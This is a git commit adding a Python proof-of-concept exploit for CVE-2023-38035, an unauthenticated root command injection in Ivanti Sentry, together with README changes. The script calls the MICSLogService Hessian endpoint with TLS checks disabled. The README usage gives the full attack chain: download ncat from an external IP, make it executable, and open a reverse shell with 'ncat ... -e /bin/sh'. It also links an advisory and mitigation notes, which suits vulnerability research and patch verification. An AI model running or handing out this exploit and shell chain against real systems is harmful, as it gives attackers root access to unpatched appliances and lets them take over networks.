Added POC

mr-sparkles-h3 · mr-sparkles-h3 · commit 13a807c49a11 · 2023-08-23T14:42:35.000-04:00
diff --git a/CVE-2023-38035.py b/CVE-2023-38035.py
@@ -0,0 +1,52 @@
+from pyhessian.client import HessianProxy
+from http.client import HTTPSConnection
+import ssl
+import sys
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings()
+
+
+# Backup original constructor
+_original_https_init = HTTPSConnection.__init__
+
+def patched_https_init(self, *args, **kwargs):
+    # If context is not provided, use unverified context
+    if 'context' not in kwargs:
+        kwargs['context'] = ssl._create_unverified_context()
+    _original_https_init(self, *args, **kwargs)
+
+
+def exploit(base_url, command):
+    # Define the Hessian service endpoint
+    service_url = f"{base_url}/mics/services/MICSLogService"
+    
+    r = requests.get(service_url, verify=False)
+    if r.status_code != 405:
+        print('[-] Vulnerable endpoint was not reachable - bailing')
+        sys.exit()
+
+    # Monkey-patch the constructor
+    HTTPSConnection.__init__ = patched_https_init
+    
+    dto = {
+        "command": command,
+        "isRoot": True,
+    }
+    
+    # Create a Hessian proxy for the service
+    proxy = HessianProxy(service_url)
+    
+    # Call a method on the Hessian service:
+    details = proxy.uploadFileUsingFileInput(dto, None)
+    if details:
+        print('[+] Successfully executed command on target!')
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', help='The URL of the target', required=True)
+    parser.add_argument('-c', '--cmd', help='The command to run', required=True)
+    args = parser.parse_args()
+
+    exploit(args.url, args.cmd)
diff --git a/README.md b/README.md
@@ -6,13 +6,22 @@ A technical root cause analysis of the vulnerability can be found on our blog:
 https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
 
 ## Summary
-This POC abuses an unauthenticated command injection to obtain a shell as the root user
+This POC abuses an unauthenticated command injection to execute arbitrary commands as the root user.
+
+The execution context does not allow for command piping, and the system does not ship with easily abusable binaries, so commands can be chained to download a static ncat from somewhere like https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.
 
 ## Usage
 ```plaintext
-
+python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
+[+] Successfully executed command on target!
+python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
+[+] Successfully executed command on target!
+python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
+[+] Successfully executed command on target!
 ```
 
+![Shell](shell.png)
+
 ## Mitigations
 Update to the latest version according to the instructions within the Ivanti Advisory
 * https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US
diff --git a/shell.png b/shell.png
